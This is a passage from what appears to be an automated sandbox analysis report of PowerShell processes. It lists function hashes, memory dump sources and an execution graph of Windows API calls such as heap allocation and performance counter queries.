                                                                    • Instruction Fuzzy Hash: 1621D431A0CA4C8FDB58DF9C984A7E97BE0EBA9321F00412FD049D3151D670A416CB81
                                                                    Function 00007FFD9B1D36C5 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1926218612.00007FFD9B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9b1d0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                    • Instruction ID: e7803dbc64a1a1febb7d97ad7096654da02e77b3dd7e8c3e701f8328929ad967
                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                    • Instruction Fuzzy Hash: FF01A77120CB0C4FD748EF0CE051AA5B3E0FB85364F10056DE58AC36A1D632E882CB41
                                                                    Function 00007FFD9B2A3642 Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1926949874.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9b2a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f9ee64776a541f8985dc589eb3607f1d61402e2d53d864824fc0bb53bfdf5b47
                                                                    • Instruction ID: e9135b62eadaee10e88cb63743f2fe203bd113a31817f78f9faeca8ebcfe8925
                                                                    • Opcode Fuzzy Hash: f9ee64776a541f8985dc589eb3607f1d61402e2d53d864824fc0bb53bfdf5b47
                                                                    • Instruction Fuzzy Hash: 6AF0B432B0D6088FD768EB4CE4518A473E0FF4972071500F6E05DC75A7DA26AC01C785
                                                                    Function 00007FFD9B2A38F0 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1926949874.00007FFD9B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9b2a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 99effcc6e42f3953137af94fb9103fb5f09997561a31fcb57a0c5c92e3e6ea7b
                                                                    • Instruction ID: 8de4bba5945ebf2bc9b5d5cc9b50a32fd1348f758520289db0da91dd40325f78
                                                                    • Opcode Fuzzy Hash: 99effcc6e42f3953137af94fb9103fb5f09997561a31fcb57a0c5c92e3e6ea7b
                                                                    • Instruction Fuzzy Hash: 28F08232B0DA498FDB69EB9CE4918A8B7E0FF45320B5500F6E05DCB5A3DA26EC44C751
                                                                    Function 00007FFD9B1D9C40 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1926218612.00007FFD9B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9b1d0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 592dd1677751df4d482a17b2a9bdaf608b83d038b758f6bdb669a16fd3845ee3
                                                                    • Instruction ID: ab42243f55326cced23457d485bef3cc0b30536e773ecdb9497b65c41bd2238a
                                                                    • Opcode Fuzzy Hash: 592dd1677751df4d482a17b2a9bdaf608b83d038b758f6bdb669a16fd3845ee3
                                                                    • Instruction Fuzzy Hash: 17F0B43081868D8FDB45DF7488599E57FE0FF26354B0502ABE45CC70B2DB74A954CB92

                                                                    Non-executed Functions

                                                                    Function 00007FFD9B1D4FFB Relevance: .4, Instructions: 380COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1926218612.00007FFD9B1D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1D0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9b1d0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 28fa222a7c12b087a2f6e65eca3b6303d3c673746620161aa567d7c4ef902b38
                                                                    • Instruction ID: 576d4a0a8fbf02a7dffaaae93411efddb9dd01f950a581601356fcd454d5857d
                                                                    • Opcode Fuzzy Hash: 28fa222a7c12b087a2f6e65eca3b6303d3c673746620161aa567d7c4ef902b38
                                                                    • Instruction Fuzzy Hash: 13917F07B0D97205E325B2FD782E9ED9B50CFC16BFB1A86B7D29D890C74D09248E42E5

                                                                    Executed Functions

                                                                    Function 00007FFD9B2C5AD4 Relevance: .5, Instructions: 508COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2072533424.00007FFD9B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9b2c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8439cda5951b47fddb0bd8a8d3b49bbaa3750b19104bc395daff4f28ea3d8325
                                                                    • Instruction ID: 87fdd6b1c3f692cd1584876176ef106873e942dc019144ba476a13bee7c57be5
                                                                    • Opcode Fuzzy Hash: 8439cda5951b47fddb0bd8a8d3b49bbaa3750b19104bc395daff4f28ea3d8325
                                                                    • Instruction Fuzzy Hash: B6E14822B0FBCA0FE7A6A66C58765707BD1EF56210B0A01FBD08DCB1E3DA19ED458341
                                                                    Function 00007FFD9B0DED40 Relevance: .1, Instructions: 127COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2070002058.00007FFD9B0DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B0DD000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9b0dd000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: abcb0861fd81e8ddd3aac6279367531ef7a4d03c13f87f8524634e45963195a7
                                                                    • Instruction ID: 6a3d1e610e6bc7f85137e9ee6337ddac25bd1cb913945453273f1cf7bdbf83b2
                                                                    • Opcode Fuzzy Hash: abcb0861fd81e8ddd3aac6279367531ef7a4d03c13f87f8524634e45963195a7
                                                                    • Instruction Fuzzy Hash: 3E41F87040EBC44FE7569B2998559523FF0EF57220B1606DFE08CCB1E3D625A846C7A2
                                                                    Function 00007FFD9B1F9A3F Relevance: .1, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2071441594.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9b1f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 574854f67d97f777c7f0e871171c2f55623636a03faa6a38e510497c3c1f37e6
                                                                    • Instruction ID: 22178db887cfdc15100e8a96e550ea52294ed0706463f83dc1019f073c17c7d3
                                                                    • Opcode Fuzzy Hash: 574854f67d97f777c7f0e871171c2f55623636a03faa6a38e510497c3c1f37e6
                                                                    • Instruction Fuzzy Hash: E7318431A1CB4C9FDB1CDB5CA84A6A97BE0FB99721F00422FE449D3651CB71A855CBC2
                                                                    Function 00007FFD9B1FA948 Relevance: .1, Instructions: 101COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2071441594.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9b1f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 96de9e062293792912cb1ab02de773544ba7675401e24280688920b9c617c413
                                                                    • Instruction ID: 7ca63bbf9811f95b0b0087377f26fad1f57f5330ddd4ad9dcc664caeb7577bff
                                                                    • Opcode Fuzzy Hash: 96de9e062293792912cb1ab02de773544ba7675401e24280688920b9c617c413
                                                                    • Instruction Fuzzy Hash: B0210731A0CA4C8FDB58DB9C984A7E97BE0EB96321F04426BD048C3156DA74A456CB91
                                                                    Function 00007FFD9B1F3475 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2071441594.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9b1f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                    • Instruction ID: 14b68a300fd892b20854a2faacc7bbfacc64b781e4be035bf77bfab3e9cde47a
                                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                    • Instruction Fuzzy Hash: 7401677121CB0C4FD748EF4CE451AA5B7E0FB95364F10056EE58AC36A5D636E881CB45
                                                                    Function 00007FFD9B1FA788 Relevance: .0, Instructions: 39COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2071441594.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9b1f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e8d32bce3b9acdb14a6a6f916678b7c495e7451222ae8215f52e36ee9ac051ad
                                                                    • Instruction ID: b27508b9be33615be015ad8fe37bb7c9b8d56a61cef730fe2b80a3485efd652d
                                                                    • Opcode Fuzzy Hash: e8d32bce3b9acdb14a6a6f916678b7c495e7451222ae8215f52e36ee9ac051ad
                                                                    • Instruction Fuzzy Hash: CBF0B43181868D8FDB06DF7488559D57FB0FF26310B0502A7E45DC70B2DB74A558CB92
                                                                    Function 00007FFD9B2C460D Relevance: .0, Instructions: 37COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2072533424.00007FFD9B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9b2c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9375033c0528ddf9b7a86d3fd48cca7c8290388e3464fda95116e4640ce272a0
                                                                    • Instruction ID: 90d6eee67e9b61ad744511e85556c84869be3b1bd738be345d2d068e535ed44d
                                                                    • Opcode Fuzzy Hash: 9375033c0528ddf9b7a86d3fd48cca7c8290388e3464fda95116e4640ce272a0
                                                                    • Instruction Fuzzy Hash: 86F0BE32B0D9098FDB68EB5CE4518A973E0EF4932076100FAE06DC71ABCA25EC44C741
                                                                    Function 00007FFD9B2C48C0 Relevance: .0, Instructions: 35COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2072533424.00007FFD9B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9b2c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e5c9a1a664516c014eb360fa879bf6eb6d6be3f3e86a8b820608219cd2d8cb83
                                                                    • Instruction ID: 4699cb229ac49263ccf0d6e2f86bf2c881dc2fe62e56f48cbf530cc3cd7bff63
                                                                    • Opcode Fuzzy Hash: e5c9a1a664516c014eb360fa879bf6eb6d6be3f3e86a8b820608219cd2d8cb83
                                                                    • Instruction Fuzzy Hash: 17F0E232B0D6488FEB68EB5CE4908A873E0FF0532074101FAE02DCB0A3CA26EC44C740

                                                                    Non-executed Functions

                                                                    Function 00007FFD9B1F8AB5 Relevance: 6.4, Strings: 5, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.2071441594.00007FFD9B1F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B1F0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_14_2_7ffd9b1f0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: L_^$L_^$L_^$L_^$L_^
                                                                    • API String ID: 0-2264858084
                                                                    • Opcode ID: 54c3b81c94e3b759b193491dce74901fa8bea93ae694a7a97d9c41b37d1b8fd3
                                                                    • Instruction ID: 63cdad6a20fdbef7c6d4dd743b627add2d649b495b266222cc00e1f67419a46f
                                                                    • Opcode Fuzzy Hash: 54c3b81c94e3b759b193491dce74901fa8bea93ae694a7a97d9c41b37d1b8fd3
                                                                    • Instruction Fuzzy Hash: E551B6A3B0FAC24FE362466A49664943F50FF23699B0A11F7C1D44B1E3ED262907C346

                                                                    Execution Graph

                                                                    Execution Coverage:5.1%
                                                                    Dynamic/Decrypted Code Coverage:0.2%
                                                                    Signature Coverage:10.7%
                                                                    Total number of Nodes:1120
                                                                    Total number of Limit Nodes:17
                                                                    execution_graph 35476 7ffdfb20c160 35477 7ffdfb20c174 35476->35477 35478 7ffdfb20c179 35477->35478 35481 7ffdfb20c1e8 35477->35481 35479 7ffdfb21ced0 73 API calls 35478->35479 35480 7ffdfb20c18d 35479->35480 35482 7ffdfb20c239 35481->35482 35485 7ffdfb20c2a8 35481->35485 35483 7ffdfb21ced0 73 API calls 35482->35483 35484 7ffdfb20c24d 35483->35484 35494 7ffdfb21ced0 35485->35494 35487 7ffdfb20c31b GlobalMemoryStatusEx 35490 7ffdfb20c3bc 35487->35490 35488 7ffdfb20c40e K32GetPerformanceInfo 35489 7ffdfb20c458 35488->35489 35502 7ffdfb220280 35489->35502 35490->35488 35492 7ffdfb20c571 memcpy 35493 7ffdfb20c4bd 35493->35492 35493->35493 35495 7ffdfb21cee7 35494->35495 35501 7ffdfb21cf0b 35494->35501 35495->35501 35560 7ffdfb20a8d0 35495->35560 35498 7ffdfb21d00f 35564 7ffdfb2de6d0 72 API calls 35498->35564 35499 7ffdfb21cfd7 memset 35499->35501 35501->35487 35503 7ffdfb2202b6 PdhCollectQueryData 35502->35503 35508 7ffdfb2203e8 35502->35508 35504 7ffdfb2202d6 35503->35504 35505 7ffdfb2202ca 35503->35505 35506 7ffdfb20f280 88 API calls 35504->35506 35518 7ffdfb2207ea 35504->35518 35678 7ffdfb20ef30 memcmp PdhGetFormattedCounterValue 35505->35678 35513 7ffdfb2202f9 35506->35513 35519 7ffdfb22040a 35508->35519 35685 7ffdfb20e670 87 API calls 35508->35685 35509 7ffdfb220361 35512 7ffdfb2203df 35509->35512 35680 7ffdfb20fe90 76 API calls 35509->35680 35510 7ffdfb220416 35510->35512 35515 7ffdfb20a8d0 HeapAlloc 35510->35515 35512->35493 35513->35509 35513->35518 35679 7ffdfb20ef30 memcmp PdhGetFormattedCounterValue 35513->35679 35521 7ffdfb22060c 35515->35521 35692 7ffdfb2deab0 35518->35692 35519->35510 35519->35518 35686 7ffdfb20ed90 35519->35686 35520 7ffdfb220535 35520->35510 35525 7ffdfb20a8e0 HeapFree 35520->35525 35521->35518 35527 7ffdfb20a8d0 HeapAlloc 35521->35527 35522 7ffdfb220385 35522->35512 35681 7ffdfb20a8e0 35522->35681 35523 7ffdfb220469 35523->35510 35523->35520 35532 7ffdfb20a8e0 HeapFree 35523->35532 35525->35510 35526 7ffdfb220855 35528 7ffdfb2deab0 72 API calls 35526->35528 35530 7ffdfb22065f 35527->35530 35531 7ffdfb220864 35528->35531 35530->35526 35571 7ffdfb222a60 35530->35571 35533 7ffdfb20a8e0 HeapFree 35531->35533 35532->35523 35535 7ffdfb22087c 35533->35535 35705 7ffdfb302850 RtlCaptureContext RtlUnwindEx abort 35535->35705 35539 7ffdfb220884 35712 7ffdfb2194a0 HeapFree 35539->35712 35541 7ffdfb2207cb 35541->35503 35541->35512 35542 7ffdfb220898 35544 7ffdfb302850 6 API calls 35542->35544 35543 7ffdfb2e0010 78 API calls 35545 7ffdfb2206b6 35543->35545 35547 7ffdfb2208e9 35544->35547 35545->35541 35545->35543 35546 7ffdfb222a60 79 API calls 35545->35546 35546->35545 35548 7ffdfb220906 35547->35548 35550 7ffdfb302850 6 API calls 35547->35550 35549 7ffdfb20a8e0 HeapFree 35548->35549 35551 7ffdfb220919 35549->35551 35550->35548 35552 7ffdfb302850 6 API calls 35551->35552 35554 7ffdfb220921 35552->35554 35553 7ffdfb22095c 35713 7ffdfb224840 HeapFree 35553->35713 35554->35553 35556 7ffdfb20a8e0 HeapFree 35554->35556 35556->35553 35557 7ffdfb22096e 35558 7ffdfb220989 35557->35558 35559 7ffdfb20a8e0 HeapFree 35557->35559 35559->35558 35561 7ffdfb2a5270 35560->35561 35565 7ffdfb2b71b0 35561->35565 35563 7ffdfb21cfd2 35563->35498 35563->35499 35564->35501 35567 7ffdfb2b7170 35565->35567 35570 7ffdfb2b718b HeapAlloc 35565->35570 35569 7ffdfb2b71a6 35567->35569 35567->35570 35568 7ffdfb3fcf38 35569->35563 35570->35563 35570->35568 35714 7ffdfb225740 35571->35714 35573 7ffdfb222aa4 35574 7ffdfb222aba 35573->35574 35740 7ffdfb228370 73 API calls 35573->35740 35730 7ffdfb20f090 35574->35730 35578 7ffdfb222b32 35580 7ffdfb222b1e 35578->35580 35581 7ffdfb20a8e0 HeapFree 35578->35581 35579 7ffdfb222af1 35579->35580 35583 7ffdfb20a8e0 HeapFree 35579->35583 35582 7ffdfb2206a7 35580->35582 35584 7ffdfb20a8e0 HeapFree 35580->35584 35581->35580 35585 7ffdfb20f280 35582->35585 35583->35580 35584->35582 35586 7ffdfb20f29e 35585->35586 35674 7ffdfb20fa41 35585->35674 35587 7ffdfb20f2b7 GetSystemInfo 35586->35587 35588 7ffdfb20f470 35587->35588 35589 7ffdfb20f2e2 35587->35589 35592 7ffdfb20a8d0 HeapAlloc 35588->35592 35590 7ffdfb20a8d0 HeapAlloc 35589->35590 35591 7ffdfb20f302 35590->35591 35593 7ffdfb20fad8 35591->35593 35594 7ffdfb20f30b 35591->35594 35595 7ffdfb20f543 35592->35595 35596 7ffdfb2deab0 72 API calls 35593->35596 35602 7ffdfb20f392 35594->35602 35743 7ffdfb228760 73 API calls 35594->35743 35597 7ffdfb20fab8 35595->35597 35598 7ffdfb20f54c 35595->35598 35600 7ffdfb20fae7 35596->35600 35599 7ffdfb2deab0 72 API calls 35597->35599 35748 7ffdfb20fde0 73 API calls 35598->35748 35622 7ffdfb20f6ee 35599->35622 35604 7ffdfb2deab0 72 API calls 35600->35604 35607 7ffdfb20a8d0 HeapAlloc 35602->35607 35603 7ffdfb20f56f 35749 7ffdfb20fde0 73 API calls 35603->35749 35604->35622 35609 7ffdfb20f3ac 35607->35609 35608 7ffdfb20f57b 35750 7ffdfb20fde0 73 API calls 35608->35750 35609->35600 35611 7ffdfb20f3b5 35609->35611 35632 7ffdfb20f47d 35611->35632 35744 7ffdfb20fde0 73 API calls 35611->35744 35612 7ffdfb20fcd3 35614 7ffdfb20a8e0 HeapFree 35612->35614 35613 7ffdfb302850 6 API calls 35613->35612 35616 7ffdfb20fce7 35614->35616 35618 7ffdfb302850 6 API calls 35616->35618 35617 7ffdfb20f3ed 35745 7ffdfb20fde0 73 API calls 35617->35745 35620 7ffdfb20fcef 35618->35620 35635 7ffdfb20f280 85 API calls 35620->35635 35621 7ffdfb20f3fa 35746 7ffdfb20fde0 73 API calls 35621->35746 35622->35612 35622->35613 35623 7ffdfb20f587 35623->35622 35624 7ffdfb20faf8 35623->35624 35630 7ffdfb20a8d0 HeapAlloc 35623->35630 35645 7ffdfb20f610 memcpy 35623->35645 35628 7ffdfb2deab0 72 API calls 35624->35628 35625 7ffdfb20f4d8 35631 7ffdfb20a8e0 HeapFree 35625->35631 35634 7ffdfb20f4fa 35625->35634 35627 7ffdfb20f407 35747 7ffdfb20fde0 73 API calls 35627->35747 35628->35622 35637 7ffdfb20f63b 35630->35637 35631->35634 35632->35622 35632->35625 35633 7ffdfb20fb1b 35632->35633 35640 7ffdfb20a8d0 HeapAlloc 35632->35640 35650 7ffdfb20f731 memcpy 35632->35650 35641 7ffdfb2deab0 72 API calls 35633->35641 35634->35588 35642 7ffdfb20a8e0 HeapFree 35634->35642 35643 7ffdfb20fd0f 35635->35643 35637->35624 35637->35645 35638 7ffdfb20f66f 35648 7ffdfb20f6ad 35638->35648 35649 7ffdfb20f6c2 35638->35649 35639 7ffdfb20f65f 35646 7ffdfb20a8e0 HeapFree 35639->35646 35647 7ffdfb20f728 35640->35647 35641->35622 35642->35588 35643->35545 35645->35638 35645->35639 35646->35638 35647->35633 35647->35650 35751 7ffdfb20fe90 76 API calls 35648->35751 35653 7ffdfb20f6bd 35649->35653 35752 7ffdfb20a900 HeapAlloc 35649->35752 35650->35625 35650->35634 35657 7ffdfb20a8d0 HeapAlloc 35653->35657 35654 7ffdfb20fde0 73 API calls 35661 7ffdfb20f414 35654->35661 35655 7ffdfb20f6dc 35655->35653 35656 7ffdfb20f6e1 35655->35656 35659 7ffdfb2deab0 72 API calls 35656->35659 35658 7ffdfb20f76f 35657->35658 35660 7ffdfb20fac9 35658->35660 35675 7ffdfb20f778 35658->35675 35659->35622 35663 7ffdfb2deab0 72 API calls 35660->35663 35661->35632 35661->35654 35662 7ffdfb20f988 35664 7ffdfb20f9de 35662->35664 35665 7ffdfb20a8e0 HeapFree 35662->35665 35663->35622 35666 7ffdfb20f9fe 35664->35666 35668 7ffdfb20a8e0 HeapFree 35664->35668 35665->35664 35669 7ffdfb20fa1e 35666->35669 35670 7ffdfb20a8e0 HeapFree 35666->35670 35668->35666 35827 7ffdfb224840 HeapFree 35669->35827 35670->35669 35671 7ffdfb2e2340 74 API calls 35671->35675 35673 7ffdfb20fa26 35673->35674 35676 7ffdfb20a8e0 HeapFree 35673->35676 35674->35545 35675->35662 35675->35671 35753 7ffdfb2e0010 35675->35753 35826 7ffdfb228130 73 API calls 35675->35826 35676->35674 35678->35504 35679->35513 35680->35522 35682 7ffdfb2a52d0 HeapFree 35681->35682 35682->35512 35684 7ffdfb3fcf48 35682->35684 35685->35519 35687 7ffdfb20ee1a 35686->35687 35691 7ffdfb20eda6 35686->35691 35688 7ffdfb20ee65 PdhCloseQuery 35687->35688 35689 7ffdfb20ee6a 35687->35689 35688->35689 35689->35523 35690 7ffdfb20edc5 PdhRemoveCounter 35690->35687 35690->35691 35691->35690 35691->35691 35693 7ffdfb2deabf 35692->35693 35831 7ffdfb2dead0 35693->35831 35695 7ffdfb2deac9 35841 7ffdfb20a910 72 API calls 35695->35841 35697 7ffdfb2deae8 35698 7ffdfb2dec53 35697->35698 35699 7ffdfb2dec2c memcpy 35697->35699 35702 7ffdfb20a8d0 HeapAlloc 35697->35702 35701 7ffdfb2deab0 71 API calls 35698->35701 35699->35526 35703 7ffdfb2dec60 35701->35703 35704 7ffdfb2dec27 35702->35704 35703->35526 35704->35698 35704->35699 35706 7ffdfb30293b RaiseException 35705->35706 35707 7ffdfb302972 35705->35707 35706->35539 35843 7ffdfb3024a0 RaiseException 35707->35843 35709 7ffdfb302977 abort 35844 7ffdfb3024a0 RaiseException 35709->35844 35711 7ffdfb3029a5 35711->35539 35712->35542 35713->35557 35716 7ffdfb22575d 35714->35716 35715 7ffdfb2257dc 35718 7ffdfb2deab0 72 API calls 35715->35718 35723 7ffdfb2257e5 35715->35723 35716->35715 35717 7ffdfb20a8d0 HeapAlloc 35716->35717 35716->35723 35717->35715 35719 7ffdfb225a6e 35718->35719 35720 7ffdfb225a8e 35719->35720 35721 7ffdfb20a8e0 HeapFree 35719->35721 35722 7ffdfb302850 6 API calls 35720->35722 35721->35720 35726 7ffdfb225a96 35722->35726 35723->35573 35724 7ffdfb225afa 35725 7ffdfb2deab0 72 API calls 35724->35725 35727 7ffdfb225aff 35724->35727 35728 7ffdfb225b2e 35725->35728 35726->35724 35726->35727 35729 7ffdfb20a8d0 HeapAlloc 35726->35729 35727->35573 35728->35573 35729->35724 35731 7ffdfb20f19b 35730->35731 35735 7ffdfb20f0d3 35730->35735 35732 7ffdfb20f197 35731->35732 35741 7ffdfb2e2340 74 API calls 35731->35741 35734 7ffdfb20a8e0 HeapFree 35732->35734 35737 7ffdfb20f1d1 35732->35737 35734->35737 35735->35731 35736 7ffdfb20f184 memcmp 35735->35736 35736->35732 35736->35735 35737->35578 35737->35579 35738 7ffdfb20f1e2 35742 7ffdfb2269e0 75 API calls 35738->35742 35740->35574 35741->35738 35742->35732 35743->35594 35744->35617 35745->35621 35746->35627 35747->35661 35748->35603 35749->35608 35750->35623 35751->35653 35752->35655 35755 7ffdfb2e00f7 35753->35755 35756 7ffdfb2e0032 35753->35756 35754 7ffdfb2e012c 35754->35675 35755->35754 35757 7ffdfb2deab0 72 API calls 35755->35757 35756->35755 35758 7ffdfb20a8d0 HeapAlloc 35756->35758 35759 7ffdfb2e0181 35757->35759 35758->35755 35760 7ffdfb2e019c 35759->35760 35762 7ffdfb20a8e0 HeapFree 35759->35762 35761 7ffdfb302850 6 API calls 35760->35761 35764 7ffdfb2e01a4 35761->35764 35762->35760 35763 7ffdfb2e01ee 35763->35675 35764->35763 35765 7ffdfb2e0975 35764->35765 35767 7ffdfb20a8d0 HeapAlloc 35764->35767 35777 7ffdfb2e02c9 35764->35777 35766 7ffdfb2deab0 72 API calls 35765->35766 35770 7ffdfb2e0711 35766->35770 35769 7ffdfb2e02c0 35767->35769 35768 7ffdfb2e05b3 35768->35675 35769->35765 35769->35777 35771 7ffdfb2e09d5 35770->35771 35773 7ffdfb20a8e0 HeapFree 35770->35773 35772 7ffdfb302850 6 API calls 35771->35772 35774 7ffdfb2e09dd 35772->35774 35773->35771 35775 7ffdfb2e0eaa 35774->35775 35778 7ffdfb20a8d0 HeapAlloc 35774->35778 35796 7ffdfb2e0a73 35774->35796 35779 7ffdfb2deab0 72 API calls 35775->35779 35776 7ffdfb2e2170 73 API calls 35776->35777 35777->35768 35777->35770 35777->35776 35780 7ffdfb2e0a6a 35778->35780 35781 7ffdfb2e0eb8 35779->35781 35780->35775 35780->35796 35783 7ffdfb2e0ed3 35781->35783 35784 7ffdfb20a8e0 HeapFree 35781->35784 35782 7ffdfb2e0e4c 35782->35675 35785 7ffdfb302850 6 API calls 35783->35785 35784->35783 35787 7ffdfb2e0edb 35785->35787 35786 7ffdfb2e0f52 35786->35675 35787->35786 35788 7ffdfb2e0f4d 35787->35788 35789 7ffdfb2e1017 35787->35789 35791 7ffdfb20a8d0 HeapAlloc 35787->35791 35794 7ffdfb2e0f8a memcpy 35788->35794 35828 7ffdfb2de990 72 API calls 35788->35828 35792 7ffdfb2deab0 72 API calls 35789->35792 35790 7ffdfb2e2170 73 API calls 35790->35796 35793 7ffdfb2e0f44 35791->35793 35795 7ffdfb2e103d 35792->35795 35793->35788 35793->35789 35802 7ffdfb2e0fde 35794->35802 35803 7ffdfb2e0fb0 35794->35803 35798 7ffdfb2e1058 35795->35798 35800 7ffdfb20a8e0 HeapFree 35795->35800 35796->35782 35796->35790 35801 7ffdfb302850 6 API calls 35798->35801 35800->35798 35806 7ffdfb2e1060 35801->35806 35802->35786 35804 7ffdfb2e0fe3 memcpy 35802->35804 35805 7ffdfb2e0fc0 memcpy 35803->35805 35804->35786 35805->35802 35805->35805 35807 7ffdfb2e1275 35806->35807 35808 7ffdfb2e10ee 35806->35808 35810 7ffdfb20a8d0 HeapAlloc 35806->35810 35822 7ffdfb2e10f3 35806->35822 35809 7ffdfb2deab0 72 API calls 35807->35809 35811 7ffdfb2e113f memcpy 35808->35811 35829 7ffdfb2de990 72 API calls 35808->35829 35812 7ffdfb2e1282 35809->35812 35813 7ffdfb2e10e5 35810->35813 35816 7ffdfb2e116e 35811->35816 35825 7ffdfb2e1180 35811->35825 35817 7ffdfb2e129f 35812->35817 35819 7ffdfb20a8e0 HeapFree 35812->35819 35813->35807 35813->35808 35830 7ffdfb2de990 72 API calls 35816->35830 35820 7ffdfb302850 6 API calls 35817->35820 35819->35817 35821 7ffdfb2e12a7 35820->35821 35822->35675 35823 7ffdfb2e1200 memcpy 35823->35825 35824 7ffdfb2de990 72 API calls 35824->35825 35825->35822 35825->35823 